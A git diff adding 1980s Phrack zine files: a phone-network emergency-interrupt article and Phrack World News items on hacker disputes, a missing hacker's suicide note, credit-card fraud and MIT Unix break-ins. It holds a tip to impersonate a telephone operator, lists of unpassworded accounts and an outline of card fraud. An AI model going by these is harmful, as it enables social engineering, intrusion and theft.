+report this to the 815 TSPS, who would then report to the customer (caller A)
+that 314+555+1000 wasn't busy and he could call as normal. However if the
+given number (in this case, 314+555+1000) was busy, then several things would
+happen and the process of BLV and EMER INT would begin. The 314 Inward would
+seize a Verification trunk (or BLV trunk) to the toll office that served the
+local loop of the requested number (555+1000). Now another feature of TSPS
+checks the line asked to be verified against a list of lines that can't be
+verified, such as radio stations, police, etc. If the line number a customer
+gives is on the list then the verification cannot be done, and the operator
+tells the customer.
+
+    Now the TSPS operator would press her VFY (VeriFY) key on the TSPS
+console, and the equipment would outpulse (onto the BLV trunk)
+KP+0XX+PRE+SUFF+ST. The KP being Key Pulse, the 0XX being a 'screening code'
+that protects against trunk mismatching, the PRE being the Prefix of the
+requested number (555), the SUFF being the Suffix of the requested number
+(1000), and the ST being STart, which tells the Verification trunk that no
+more MF digits follow. The screening code is there to keep a normal Toll
+Network (used in regular calls) trunk from accidentally connecting to a
+Verification trunk. If this screening code wasn't present, and a trunk
+mismatch did occur, someone calling a friend in the same area code might just
+happen to be connected to his friends line, and find himself in the middle of
+a conversation. But, the Verification trunk is waiting for an 0XX sequence,
+and a normal call on a Toll Network trunk does not outpulse an 0XX first.
+(Example: You live at 914+555+1000, and wish to call 914+666+0000. The routing
+for your call would be KP+666+0000+ST. The BLV trunk cannot accept a 666 in
+place of the proper 0XX routing, and thus would give the caller a re-order
+tone.) Also, note that the outpulsing sequence onto a BLV trunk can't contain
+an Area Code. This is the reason why if a customer requests an interrupt
+outside of his own NPA, the TSPS operator must call an Inward for the area
+code that can outpulse onto the proper trunk. If a TSPS in 815 tried to do an
+interrupt on a trunk in 314, it would not work. This proves that there is a
+BLV network for each NPA, and if you somehow gain access to a BLV trunk, you
+could only use it for interrupts within the NPA that the trunk was located in.
+
+    BLV trunks 'hunt' to find the right trunks to the right Class 5 End Office
+that serves the given local loop. The same outpulsing sequence is passed along
+BLV trunks until the BLV trunk serving the Toll Office that serves the given
+End Office is found.
+
+    There is usually one BLV trunk per 10,000 lines (exchange). So, if a Toll
+Office served ten End Offices, that Toll Office would have 100,000 local loops
+that it served, and have 10 BLV trunks running from TSPS to that Toll Office.
+
+    Now, the operator (in using the VFY key) can hear what is going on on the
+line, (modem, voice, or a permanent signal, indicating a phone off-hook) and
+take appropriate action. She can't hear what's taking place on the line
+clearly, however. A speech scrambler circuit within the operator console
+generates a scramble on the line while the operator is doing a VFY. The
+scramble is there to keep operators from listening in on people, but it is not
+enough to keep an op from being able to tell if a conversation, modem signal,
+or a dial tone is present upon the line. If the operator hears a permanent
+signal, she can only report back to the customer that either the phone is
+off-hook, or there is a problem with the line, and she can't do anything about
+it. In the case of caller A and B, the 314 Inward would tell the 815 TSPS, and
+the 815 TSPS would tell the customer. If there is a conversation on line, the
+operator presses a key marked EMER INT (EMERgency INTerrupt) on her console.
+This causes the operator to be added into a three way port on the busy line.
+The EMER INT key also deactivates the speech scrambling circuit and activates
+an alerting tone that can be heard by the called customer. The alerting tone
+that is played every 10 seconds tells the customer that an operator is on the
+line. Some areas don't have the alerting tone, however. Now, the operator
+would say 'Is this XXX-XXXX?' where XXX-XXXX would be the Prefix and Suffix of
+the number that the original customer requesting the interrupt gave the
+original TSPS. The customer would confirm the operator had the correct line.
+Then the Op says 'You have a call waiting from (customers name). Will you
+accept?'. This gives the customer the chance to say 'Yes' and let the calling
+party be connected to him, while the previous party would be disconnected. If
+the customer says 'No', then the operator tells the person who requested the
+interrupt that the called customer would not accept. The operator can just
+inform the busy party that someone needed to contact him or her, and have the
+people hang up, and then notify the requesting customer that the line is free.
+Or, the operator can connect the calling party and the interrupted party
+without loss of connection.
+
+    The charges for this service (in my area at least) run 1.00 for asking the
+operator to interrupt a phone call so you can get through. There is an .80
+charge if you ask the operator to verify whether the phone you're trying to
+reach is busy because of a service problem or because of a conversation. If
+the line has no conversation on it, there will be no charge for the
+verification.
+
+    When the customer who initiated the emergency interrupt gets his telephone
+bill, the charges for the interrupt call will look similar to this:
+
+12-1   530P     INTERRUPT  CL       314 555 1000  OD     1               1.00
+
+    The 12-1 is December first of the current year; 530P is the time the call
+was made to the operator requesting an interrupt; INTERRUPT CL is what took
+place, that is, an interrupt call; 314 555 1000 is the number requested; OD
+stands for Operator Dialed; the 1 is the length of the call (in minutes); and
+the 1.00 is the charge for the interrupt.  The format may be different,
+depending upon your area and telephone company.
+
+    One thing I forgot to mention about TSPS operators. In places where a
+Remote Trunking Arrangement is being used, and even places where they aren't
+in use, you may be connected to a TSPS operator in a totally different area
+code. In such a case, the TSPS that you reach in a Foreign NPA will call up an
+inward operator for your Home NPA, if the line you requested an EMER INT on
+was in your HNPA. If the line you requested EMER INT on was in the same NPA of
+the TSPS that you had reached, then no inward operator would be needed and the
+answering operator could do the entire process.
+
+    Verification trunks seem to be only accessible by a TSPS/Inward operator.
+However, there have been claims to people doing Emergency Interrupts with blue
+boxes. I don't know how to accomplish an EMER INT without the assistance of an
+operator, and I don't know if it can be done. If you really wish to
+participate in a BLV/EMER INT, call up an Inward Operator and play the part of
+a TSPS operator who needs an EMER INT upon a pre-designated busy line. Billing
+is handled at the local TSPS so you will not have to supply a billing number
+if you decide to do this.
+
+
+    If you find any errors in this file, please try to let me know about it,
+and if you find out any other information that I haven't included, feel free
+to comment.
+
+-End of file-
diff --git a/phrack11/11.txt b/phrack11/11.txt
new file mode 100644
index 0000000..4c098fa
--- /dev/null
+++ b/phrack11/11.txt
@@ -0,0 +1,385 @@
+                                ==Phrack Inc.==
+
+                   Volume Two, Issue Eleven, Phile #11 of 12
+
+PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+PWN                                                                         PWN
+PWN                      *>=-{ Phrack World News }-=<*                      PWN
+PWN                                                                         PWN
+PWN                                 Issue X                                 PWN
+PWN                                                                         PWN
+PWN                      Written, Compiled, and Edited                      PWN
+PWN                           by Knight Lightning                           PWN
+PWN                                                                         PWN
+PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+Scan Man Revisited                                            January 19, 1987
+------------------
+The following is a reprint from TeleComputist Newsletter Issue Two;
+
+                 SCAN MAN - FED OR PHREAK?  (The Other Side)
+
+    TeleComputist is printing the statement Scan Man has made to us
+[TeleComputist] in rebuttal to Phrack World News, whom previously printed an
+article concerning Scan Man in Phrack Issue VIII.  Those of you who have seen
+or read the article in Phrack VIII know that it basically covered information
+and an intercepted memo alleging Scan Man of going after hackers and turning
+in codes off his BBS (P-80 Systems, Charleston, West Virginia 304/744-2253) as
+a TMC employee.  Please note that this statement should be read with the
+article concerning Scan Man in Phrack Issue VIII to get the full
+understanding.
+
+    Scan Man started off his statement claiming not to work for TMC, but
+instead for a New York branch office of Telecom Management (a Miami based
+firm).  He was flown in from Charleston, West Virginia to New York every week
+for a four to five day duration.  Once in New York, Telecom Management made
+available a leased executive apartment where Scan Man stayed as he worked.
+His position in Telecom Management was that of a systems analyst, "...and that
+was it!" Scan Man stated.  Scan Man also stated that he had never made it a
+secret that he was working in New York and had even left messages on his BBS
+saying this.
+
+    He also went on to say that he had no part in the arrest of Shawn [of
+Phreaker's Quest] (previously known as Captain Caveman) by TMC in Las Vegas.
+Scan Man claimed to have no ties with TMC in Las Vegas and that they would not
+even know him.  Scan Man then went on to say that Shawn had never replied to
+previous messages Scan man had left asking for TMC codes.  Scan Man also said
+that the messages about TMC were in no way related to him.  He claimed to have
+no ties to TMC, which is a franchised operation which makes even TMC unrelated
+except by name.
+
+   Scan Man stated that he called Pauline Frazier and asked her about the
+inquiry by Sally Ride [:::Space Cadet] who acted as an insider to obtain the
+information in Phrack VIII.  He said that Pauline said nothing to the imposter
+(Sally Ride) and merely directed him to a TMC employee named Kevin Griffo.
+Scan Man then went on to say that the same day Sally Ride called Pauline
+Frazier was the same day he received his notice.  And to that Scan Man made
+the comment, "If I find out this is so heads will roll!"
+
+    After that comment, Scan Man came up with arguments of his own, starting
+off with the dates printed in Phrack VIII.  He claimed that the dates were off
+and backed this up by saying Ben Graves had been fired six months previously
+to the conversation with Sally Ride.  Scan Man then went on to ask why it had
+taken Sally Ride so long to come forward with his information.  Scan Man made
+one last comment, "It's a fucking shame that there is a social structure in
+the phreak world!"  Meaning Sally Ride merely presented his information to
+give himself a boost socially in the phreak world.
+
+    This is how it ended.  We would like to say that TeleComputist printed the
+statement by Scan Man to offer both sides of the story.  We make no judgements
+here and take no sides.
+
+       Reprinted with permission from TeleComputist Newsletter Issue 2
+
+            Copyright (C) 1986 by J. Thomas.   All Rights Reserved
+ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Ok, that was Scan Man's side to the story, now that he had a few months to
+come up with one.  Lets do a critical breakdown;
+
+-*- "He was flown in from Charleston, West Virginia to New York every week for
+    a four to five day duration."
+
+    Gee, wouldn't that get awfully expensive?  Every week...and "made
+    available a leased executive apartment..."   He must have been quite an
+    asset to "Telecom Management" for them to spend such large amounts on him.
+    Kinda interesting that he lived in Charleston, West Virginia (where
+    surprisingly enough there is a branch of TMC) and flew to New York every
+    week.
+
+-*- "Scan Man claimed to have no ties with TMC in Las Vegas..."  Ok, I'll buy
+    that.  Notice how he didn't say that he had no ties with TMC in
+    Charleston.  Furthermore if he had no ties with TMC in Charleston why
+    would they have his name in their company records?  Why would all those
+    employees know him or dislike him for that matter?
+
+-*- "Scan Man then went on to say that the same day Sally Ride called Pauline
+    Frazier was the day he received his notice."  Well now, how can there be a
+    connection between the two events at all when Scan Man works for Telecom
+    Management and has "no ties with TMC" and claimed "not to work for TMC"?
+    If TMC and Telecom Management are truly independent of each other then
+    nothing Sally Ride said to Pauline Frazier could have affected him in ANY
+    way. That is unless he did work for TMC in the first place.
+
+-*- "...and back this up by saying that Ben Graves had been fired six months
+    previously to the conversation with Sally Ride."  Well first of all, PWN
+    did not give a date as to when Ben Graves was fired from TMC.  Second of
+    all and more important, how does Scan Man know so much about TMC when he
+    works for "Telecom Management" and has "...no ties with TMC..."?
+
+The rest of his statements were highly debatable and he showed no proof as to
+their validity.  As for why Sally Ride waited so long to come forward, well he
+didn't wait that long at all, he came forward to myself in late May/early June
+of 1986.  My decision was to do nothing because there wasn't enough proof.
+After three months of research we had enough proof and the article was
+released.
+
+With this attempt to cover up the truth, Scan Man has only given more
+ammunition to the idea that he isn't what he claims to be.
+
+                  Special Thanks to TeleComputist Newsletter
+______________________________________________________________________________
+
+The Cracker Cracks Up?                                       December 21, 1986
+----------------------
+         "Computer 'Cracker' Is Missing -- Is He Dead Or Is He Alive"
+
+ By Tom Gorman of The Los Angeles Times
+
+ESCONDIDO, Calif. -- Early one morning in late September, computer hacker Bill
+Landreth pushed himself away from his IBM-PC computer -- its screen glowing
+with an uncompleted sentence -- and walked out the front door of a friend's
+home here.
+
+He has not been seen or heard from since.
+
+The authorities want him because he is the "Cracker", convicted in 1984 of
+breaking into some of the most secure computer systems in the United States,
+including GTE Telemail's electronic mail network, where he peeped at NASA
+Department of Defense computer correspondence.
+
+He was placed on three years' probation.  Now his probation officer is
+wondering where he is.
+
+His literary agent wants him because he is Bill Landreth the author, who
+already has cashed in on the successful publication of one book on computer
+hacking and who is overdue with the manuscript of a second computer book.
+
+The Institute of Internal Auditors wants him because he is Bill Landreth the
+public speaker who was going to tell the group in a few months how to make
+their computer systems safer from people like him.
+
+Susan and Gulliver Fourmyle want him because he is the eldest of their eight
+children.  They have not seen him since May 1985, when they moved away from
+Poway in northern San Diego county, first to Alaska then to Maui where they
+now live.
+
+His friends want him because he is crazy Bill Landreth, IQ 163, who has pulled
+stunts like this before and "disappeared" into the night air -- but never for
+more than a couple of weeks and surely not for 3 months.  They are worried.
+
+Some people think Landreth, 21, has committed suicide.  There is clear
+evidence that he considered it -- most notably in a rambling eight-page
+discourse that Landreth wrote during the summer.
+
+The letter, typed into his computer, then printed out and left in his room for
+someone to discover, touched on the evolution of mankind, prospects for man's
+immortality and the defeat of the aging process, nuclear war, communism versus
+capitalism, society's greed, the purpose of life, computers becoming more
+creative than man and finally -- suicide.
+
+The last page reads:
+
+"As I am writing this as of the moment, I am obviously not dead.  I do,
+however, plan on being dead before any other humans read this.  The idea is
+that I will commit suicide sometime around my 22nd birthday..."
+
+The note explained:
+
+"I was bored in school, bored traveling around the country, bored getting
+raided by the FBI, bored in prison, bored writing books, bored being bored.  I
+will probably be bored dead, but this is my risk to take."
+
+But then the note said:
+
+"Since writing the above, my plans have changed slightly.... But the point is,
+that I am going to take the money I have left in the bank (my liquid assets)
+and make a final attempt at making life worthy.  It will be a short attempt,
+and I do suspect that if it works out that none of my current friends will
+know me then.  If it doesn't work out, the news of my death will probably get
+around. (I won't try to hide it.)"
+
+Landreth's birthday is December 26 and his best friend is not counting on
+seeing him again.
+
+"We used to joke about what you could learn about life, especially since if
+you don't believe in a God, then there's not much point to life," said Tom
+Anderson, 16, a senior at San Pasqual High School in Escondido, about 30 miles
+north of San Diego.  Anderson also has been convicted of computer hacking and
+placed on probation.
+
+Anderson was the last person to see Landreth.  It was around September 25 --
+he does not remember exactly.  Landreth had spent a week living in Anderson's
+home so the two could share Landreth's computer.  Anderson's IBM-PC had been
+confiscated by authorities, and he wanted to complete his own book.
+
+Anderson said he and Landreth were also working on a proposal for a movie
+about their exploits.
+
+"He started to write the proposal for it on the computer, and I went to take a
+shower," Anderson said.  "When I came out, he was gone.  The proposal was in
+mid-sentence.  And I haven't seen him since."
+
+Apparently Landreth took only his house key, a passport, and the clothes on
+his back.
+
+Anderson said he initially was not concerned about Landreth's absence.  After
+all this was the same Landreth who, during the summer, took off for Mexico
+without telling anyone -- including friends he had seen just the night before
+-- of his departure.
+
+But concern grew by October 1, when Landreth failed to keep a speaking
+engagement with a group of auditors in Ohio, for which he would have received
+$1,000 plus expenses.  Landreth may have kept a messy room and poor financial
+records, but he was reliable enough to keep a speaking engagement, said his
+friends and literary agent, Bill Gladstone, noting that Landreth's second
+manuscript was due in August and had not yet been delivered.
+
+But, the manuscript never came and Landreth has not reappeared.
+
+Steve Burnap, another close friend, said that during the summer Landreth had
+grown lackadaisical toward life.  "He just didn't seem to care much about
+anything anymore."
+                        Typed for PWN by Druidic Death
+                         From The Dallas Times Herald
+______________________________________________________________________________
+
+Beware The Hacker Tracker                                       December, 1986
+-------------------------
+By Lamont Wood of Texas Computer Market Magazines
+
+If you want to live like a spy in your own country, you don't have to join the
+CIA or the M15 or the KGB.  You can track hackers, like John Maxfield of
+Detroit.
+
+Maxfield is a computer security consultant running a business called
+BoardScan, which tracks hackers for business clients.  He gets occasional
+death threats and taunting calls from his prey, among whom he is known as the
+"hacker tracker," and answers the phone warily.
+
+And although he has received no personal harassment, William Tener, head of
+data security for the information services division of TRW, Inc., has found it
+necessary to call in experts in artificial intelligence from the aerospace
+industry in an effort to protect his company's computer files.  TRW is a juicy
+target for hackers because the firm stores personal credit information on
+about 130 million Americans and 11 million businesses -- data many people
+would love to get hold of.
+
+Maxfield estimates that the hacker problem has increased by a factor of 10 in
+the last four years, and now seems to be doubling every year.  "Nearly every
+system can be penetrated by a 14-year old with $200 worth of equipment," he
+complains.  "I have found kids as young as nine years old involved in hacking.
+If such young children can do it, think of what an adult can do."
+
+Tener estimates that there are as many as 5,000 private computer bulletin
+boards in the country, and that as many as 2,000 are hacker boards.  The rest
+are as for uses as varied as club news, customer relations, or just as a hobby.
+Of the 2,000 about two dozen are used by "elite" hackers, and some have
+security features as good as anything used by the pentagon, says Maxfield.
+
+The number of hackers themselves defies estimation, if only because the users
+of the boards overlap.  They also pass along information from board to board.
+Maxfield says he has seen access codes posted on an east coast bulletin board
+that appeared on a west coast board less than an hour later, having passed
+through about ten boards in the meantime.  And within hours of the posting of
+a new number anywhere, hundreds of hackers will try it.
+
+"Nowadays, every twerp with a Commodore 64 and a modem can do it, all for the
+ego trip of being the nexus for forbidden knowledge," sighs a man in New York
+City, known either as "Richard Cheshire" or "Chesire Catalyst" -- neither is
+his real name.  Cheshire was one of the earliest computer hackers, from the
+days when the Telex network was the main target, and was the editor of TAP, a
+newsletter for hackers and phone "phreaks".  Oddly enough, TAP itself was an
+early victim of the hacker upsurge.  "The hacker kids had their bulletin
+boards and didn't need TAP -- we were technologically obsolete," he recalls.
+
+So who are these hackers and what are they doing?  Tener says most of the ones
+he has encountered have been 14 to 18 year old boys, with good computer
+systems, often bright, middle class, and good students.  They often have a
+reputation for being loners, if only because they spend hours by themselves at
+a terminal, but he's found out-going hacker athletes.
+
+But Maxfield is disturbed by the sight of more adults and criminals getting
+involved.  Most of what the hackers do involves "theft of services" -- free
+access to Compuserve, The Source, or other on-line services or corporate
+systems.  But, increasingly, the hackers are getting more and more into credit
+card fraud.
+
+Maxfield and Cheshire describe the same process -- the hackers go through
+trash bins outside businesses whose computer they want to break into looking
+for manuals or anything that might have access codes on it.  They may find it,
+but they also often find carbon copies of credit card sales slips, from which
+they can read credit card numbers.  They use these numbers to order
+merchandise -- usually computer hardware -- over the phone and have it
+delivered to an empty house in their neighborhood, or to a house where nobody
+is home during the day. Then all they have to do is be there when the delivery
+truck arrives.
+
+"We've only been seeing this in the last year," Maxfield complains.  "But now
+we find adults running gangs of kids who steal card numbers for them.  The
+adults resell the merchandise and give the kids a percentage of the money."
+
+It's best to steal the card number of someone rich and famous, but since
+that's usually not possible it's a good idea to be able to check the victim's
+credit, because the merchant will check before approving a large credit card
+sale.  And that's what makes TRW such a big target -- TRW has the credit
+files.  And the files often contain the number of any other credit cards the
+victim owns, Maxfield notes.
+
+The parents of the hackers, meanwhile, usually have no idea what their boy is
+up to -- he's in his room playing, so what could be wrong?  Tener recalls a
+case where the parents complained to the boy about the high phone bill one
+month.  And the next month the bill was back to normal.  And so the parents
+were happy.  But the boy had been billing the calls to a stolen telephone
+company credit card.
+
+"When it happens the boy is caught and taken to jail, you usually see that the
+parents are disgruntled at the authorities -- they still think that Johnny was
+just playing in his bedroom.  Until, of course, they see the cost of Johnny's
+play time, which can run $50,000 to $100,000.  But outside the cost, I have
+never yet seen a parent who was really concerned that somebody's privacy has
+been invaded -- they just think Johnny's really smart," Tener says.
+
+TRW will usually move against hackers when they see a TRW file or access
+information on a bulletin board.  Tener says they usually demand payment for
+their investigation costs, which average about $15,000.
+
+Tales of the damage hackers have caused often get exaggerated.  Tener tells of
+highly publicized cases of hackers who, when caught, bragged about breaking
+into TRW, when no break-ins had occurred.  But Maxfield tells of two 14-year
+old hackers who were both breaking into and using the same corporate system.
+They had an argument and set out to erase each other's files, and in the
+process erased other files that cost about a million dollars to replace.
+Being juveniles, they got off free.
+
+After being caught, Tener says most hackers find some other hobby.  Some,
+after turning 18, are hired by the firms they previously raided.  Tener says
+it rare to see repeat offenders, but Maxfield tells of one 14-year-old repeat
+offender who was first caught at age 13.
+
+Maxfield and Tener both make efforts to follow the bulletin boards, and
+Maxfield even has a network of double agents and spies within the hacker
+community.  Tener uses artificial intelligence software to examine the day's
+traffic to look for suspicious patterns.  TRW gets about 40,000 inquiries an
+hour and has about 25,000 subscribers.  But that does not address the
+underlying problem.
+
+"The real problem is that these systems are not well protected, and some can't
+be protected at all," Maxfield says.
+
+Cheshire agrees.  "A lot of companies have no idea what these kids can do to
+them," he says.  "If they would make access even a little difficult the kids
+will go on to some other system."  As for what else can be done, he notes that
+at MIT the first thing computer students are taught is how to crash the
+system. Consequently, nobody bothers to do it.
+
+But the thing that annoys old-timer Cheshire (and Maxfield as well) is that
+the whole hacker-intruder-vandal-thief phenomenon goes against the ideology of
+the original hackers, who wanted to explore systems, not vandalize them.
+Cheshire defines the original "hacker ethic" as the belief that information is
+a value-free resource that should be shared.  In practice, it means users
+should add items to files, not destroy them, or add features to programs,
+rather than pirate them.
+
+"These kids want to make a name for themselves, and they think that they need
+to do something dirty to do that.  But they do it just as well by doing
+something clever, such as leaving a software bug report on a system," he
+notes.
+
+Meanwhile, Maxfield says we are probably stuck with the problem at least until
+the phone systems converts to digital technology, which should strip hackers
+of anonymity by making their calls easy to trace.
+
+Until someone figures out how to hack digital phone networks, of course. -TCM
+
+                        Typed for PWN by Druidic Death
+______________________________________________________________________________
diff --git a/phrack11/12.txt b/phrack11/12.txt
new file mode 100644
index 0000000..da15371
--- /dev/null
+++ b/phrack11/12.txt
@@ -0,0 +1,463 @@
+                               ==Phrack Inc.==
+
+                  Volume Two, Issue Eleven, Phile #12 of 12
+
+PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+PWN                                                                         PWN
+PWN                      *>=-{ Phrack World News }-=<*                      PWN
+PWN                                                                         PWN
+PWN                                Issue XI                                 PWN
+PWN                                                                         PWN
+PWN                      Written, Compiled, and Edited                      PWN
+PWN                           by Knight Lightning                           PWN
+PWN                                                                         PWN
+PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+Computer Bulletin Boards                                       January 8, 1986
+------------------------
+By The KTVI Channel 2 News Staff in St. Louis
+
+Please keep in mind that Karen and Russ are anchor persons at KTVI.
+All comments in []s are by me.-KL
+ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Karen:  If Santa Claus brought you a computer for Christmas, beware of seeing
+        a few things you may not have bargained for.  Computer bulletin boards
+        have spread by the thousands over the past few years and now some
+        people are concerned that the electronic messages may have gotten a
+        bit out of hand.
+
+Russ:  In its simplest definition, a computer bulletin board is a program or
+       message that can be accessed by other computers via telephone lines.
+       Anyone who has a home computer and a modem can receive and transmit to
+       computer bulletin boards.  There are thousands of them nationwide, but
+       some are causing quite a stink [What a profound statement Russ].
+
+               [Flash to a picture of a geeky looking teenager]
+
+       Meet Jason Rebbe, he is a 16 year old computer whiz who a few months
+       ago accidentally tapped into a bulletin board called Dr. Doom's Castle.
+       [Sorry to break in here Russ, but why is this guy a computer whiz?
+       Just because he has a computer?  Hey Russ, look a little closer, isn't
+       Jason sitting in front of a Commodore-64?  I thought so.  Oh yeah one
+       other thing, this BBS Dr. Doom's Castle has no known relation to Dr.
+       Doom (512) or Danger Zone Private.]  Dr. Doom gives instructions on how
+       to build bombs and guns [Lions and Tigers and Bears, oh my!].  Jason
+       found the recipe for smoke bombs and tried to make one in his kitchen,
+       it didn't work.  [Ba ha ha].
+
+Jason:  I heard an explosion in the basement first and that's when I knew
+        something was wrong.  I thought it would be really neat to just set it
+        off someday when there was a lot of people around, just as a joke or a
+        prank.  [Yeah, that would be K-Rad d00d!].  I didn't expect it to blow
+        up my house.
+
+Russ:  Jason wasn't hurt, but it cost about 2 grand [that's $2,000 to you and
+       me] to repair the kitchen.  Jason's dad didn't take it well.
+
+Bob Holloway:  Mad wasn't the word for it.  I, I was, I was past mad.
+
+Russ:  Mr. Holloway called Southwestern Bell and AT&T to see what could be
+       done about bulletin boards like Dr. Doom's Castle.  The answer was
+       nothing.  The Bureau of Alcohol, Tobacco, and Firearms said the same
+       thing.
+
+Daniel Hoggart (Bureau of Alcohol, Tobacco, and Firearms): There is no
+               violation in publishing the information.  The violation only
+               occurs when someone actually follows through on the
+               instructions and actually constructs a bomb.
+
+Russ:  Another bulletin board that is becoming more and more prevalent these
+       days is the Aryian Nation.  This one [bulletin board] in Chicago says,
+       "If you are an anti-Communist you have made the right connection...on
+       the other hand, if you are consumed with such myths as
+       Judeo-Christianity, you most definitely dialed the wrong number."
+
+Stan Anderman (Anti-Defamation League):  Some of this really extreme hatred
+              is an attempt to create an environment where violence becomes
+              acceptable.
+
+Russ:  Like most computer bulletin boards the Aryian Nation message is legal
+       and falls under free speech laws.  However, a bill is scheduled to go
+       to congress this session outlawing the kinds of bulletin boards we saw
+       here tonight.
+
+       But, for the moment, hackers should not be too surprised if something
+       unusual pops up on their computer terminal.  [Ahem, Russ, you did it
+       again.  All computer users are *NOT* hackers.]
+
+                  Typed For PWN's Usage by Knight Lightning
+______________________________________________________________________________
+
+MIT Unix:  Victim or Aggressor?                  January 23 - February 2, 1987
+-------------------------------
+Is the MIT system an innocent victim of hacker oppression or simply another
+trap to capture unsuspecting hackers in the act?
+
+It all started like this...
+
+      [Some posts have been slightly edited to be relevant to the topic]
+
+------------------------------------------------------------------------------
+MIT
+Name: Druidic Death
+Date: 12:49 am  Mon Jan 20, 1986
+
+Lately I've been messing around on MIT's VAX in there Physics Department.
+
+Recently some one else got on there and did some damage to files.  However MIT
+told me that they'll still trust us to call them.  The number is:
+
+617-253-XXXX
+
+We have to agree to the following or we will be kicked off, they will create a
+"hacker" account for us.
+
+<1>  Use only GUEST, RODNEY, and GAMES.  No other accounts until the
+     hacker one is made.  There are no passwords on these accounts.
+
+<2>  Make sure we log off properly.  Control-D.  This is a UNIX system.
+
+<3>  Not to call between 9 AM and 5 PM Eastern Standard Time.  This
+     is to avoid tying up the system.
+
+<4>  Leave mail to GEORGE only with UNIX questions (or C).  And leave our
+     handles so he'll know who we are.
+
+------------------------------------------------------------------------------
+Unix
+Name: Celtic Phrost
+Date: 4:16 pm  Mon Jan 20, 1986
+
+Thanks Death for the MIT computer, I've been working on getting into them for
+weeks.  Here's another you can play around with:
+
+                                 617/258-XXXX
+                                 login:GUEST
+
+Or use a WHO command at the logon to see other accounts, it has been a long
+time since I played with that system, so I am unsure if the GUEST account
+still works, but if you use the WHO command you should see the GUEST account
+needed for applying for your own account.
+
+    -Phrost
+------------------------------------------------------------------------------
+Unix
+Name: Celtic Phrost
+Date: 5:35 pm  Mon Jan 20, 1986
+
+Ok, sorry, but I just remembered the application account, its: OPEN
+Gawd, I am glad I got that off my chest!
+
+    -(A relieved)Celtic Phrost.
+
+Also on that MIT computer Death listed, some other default accounts are:
+
+          LONG          MIKE          GREG          NEIL          DAN
+
+Get the rest yourself, and please people, LEAVE THEM UNPASSWORDED!
+
+------------------------------------------------------------------------------
+MIT
+Name: Druidic Death #12
+Date: 1:16 am  Fri Jan 23, 1987
+
+MIT is pretty cool.  If you haven't called yet, try it out.  Just PLEASE make
+sure you follow the little rules they asked us about! If someone doesn't do
+something right the sysop leaves the gripe mail to me.  Check out my directory
+under the guest account just type "cd Dru".  Read the first file.
+
+------------------------------------------------------------------------------
+MIT
+Name: Ctrl C
+Date: 12:56 pm  Sat Jan 24, 1987
+
+MIT Un-Passworded Unix Accounts:   617-253-XXXX
+
+ALEX   BILL   GAMES   DAVE   GUEST   DAN   GREG   MIKE   LONG   NEIL  TOM  TED
+BRIAN    RODNEY    VRET     GENTILE    ROCKY    SPIKE     KEVIN    KRIS    TIM
+
+And PLEASE don't change the Passwords....
+
+         -=>Ctrl C<=-
+------------------------------------------------------------------------------
+MIT Again
+Name: Druidic Death
+Date: 1:00 pm  Wed Jan 28, 1987
+
+Ok people, MIT is pissed, someone hasn't been keeping the bargain and they
+aren't too thrilled about it.   There were only three things they asked us to
+do, and they were reasonable too.  All they wanted was for us to not
+compromise the security much more than we had already, logoff properly, not
+leave any processes going, and call only during non-business hours, and we
+would be able to use the GUEST accounts as much as we like.
+
+Someone got real nice and added themselves to the "daemon" group which is
+superusers only, the name was "celtic".  Gee, I wonder who that could have
+been?  I'm not pissed at anyone, but I'd like to keep on using MIT's
+computers, and they'd love for us to be on, but they're getting paranoid.
+Whoever is calling besides me, be cool ok?  They even gave me a voice phone to
+chat with their sysops with.  How often do you see this happen?
+
+a little perturbed but not pissed...
+
+DRU'
+------------------------------------------------------------------------------
+Tsk, Celtic.
+Name: Evil Jay
+Date: 9:39 am  Thu Jan 29, 1987
+
+Well, personally I don't know why anyone would want to be a superuser on the
+system in question. Once you've been on once, there is really nothing that
+interesting to look at...but anyway.
+
+-EJ
+------------------------------------------------------------------------------
+In trouble again...
+Name: Celtic Phrost
+Date: 2:35 pm  Fri Jan 30, 1987
+
+...I was framed!! I did not add myself to any "daemon" group on any MIT UNIX.
+I did call once, and I must admit I did hang up without logging off, but this
+was due to a faulty program that would NOT allow me to break out of it, no
+matter what I tried.  I am sure that I didn't cause any damage by that.
+
+              -Phrost
+------------------------------------------------------------------------------
+Major Problems
+Name: Druidic Death
+Date: 12:20 pm  Sat Jan 31, 1987
+
+OK, major stuff going down.  Some unidentified individual logged into the
+Physics Dept's PDP11/34 at 617-253-XXXX and was drastically violating the
+"agreement" we had reached.  I was the one that made the "deal" with them.
+And they even gave me a voice line to talk to them with.
+
+Well, one day I called the other Physics computer, the office AT and
+discovered that someone created an account in the superuser DAEMON group
+called "celtic". Well, I was contacted by Brian through a chat and he told me
+to call him.  Then he proceeded to nicely inform me that "due to unauthorized
+abuse of the system, the deal is off".
+
+He was cool about it and said he wished he didn't have to do that.  Then I
+called George, the guy that made the deal and he said that someone who said he
+was "Celtic Phrost" went on to the system and deleted nearly a year's worth of
+artificial intelligence data from the nuclear fission research base.
+
+Needless to say I was shocked.  I said that he can't believe that it was one
+of us, that as far as I knew everyone was keeping the deal.  Then he (quite
+pissed off) said that he wanted all of our names so he can report us to the
+FBI.  He called us fags, and all sorts of stuff, he was VERY!! [underline
+twice] PISSED! I don't blame him.  Actually I'm not blaming Celtic Phrost, it
+very easily could have been a frame up.
+
+But another thing is George thinks that Celtic Phrost and Druidic Death are
+one and the same, in other words, he thinks that *I* stabbed him in the back.
+Basically he just doesn't understand the way the hacker community operates.
+
+Well, the deal is off, they plan to prosecute whoever they can catch.  Since
+George is my best friend's brother I have not only lost a friend, but I'm
+likely to see some legal problems soon.  Also, I can forget about doing my
+graduate work at MIT.  Whoever did this damage to them, I hope you're happy.
+You really messed things up real nice for a lot of people.
+
+Celtic, I don't have any reason to believe you messed with them.  I also have
+no reason to think you didn't.  I'm not making an accusation against you, but
+WHOEVER did this, deserves to be shot as far as I'm concerned.  Until this
+data was lost, they were on the verge of harnessing a laser-lithium produced
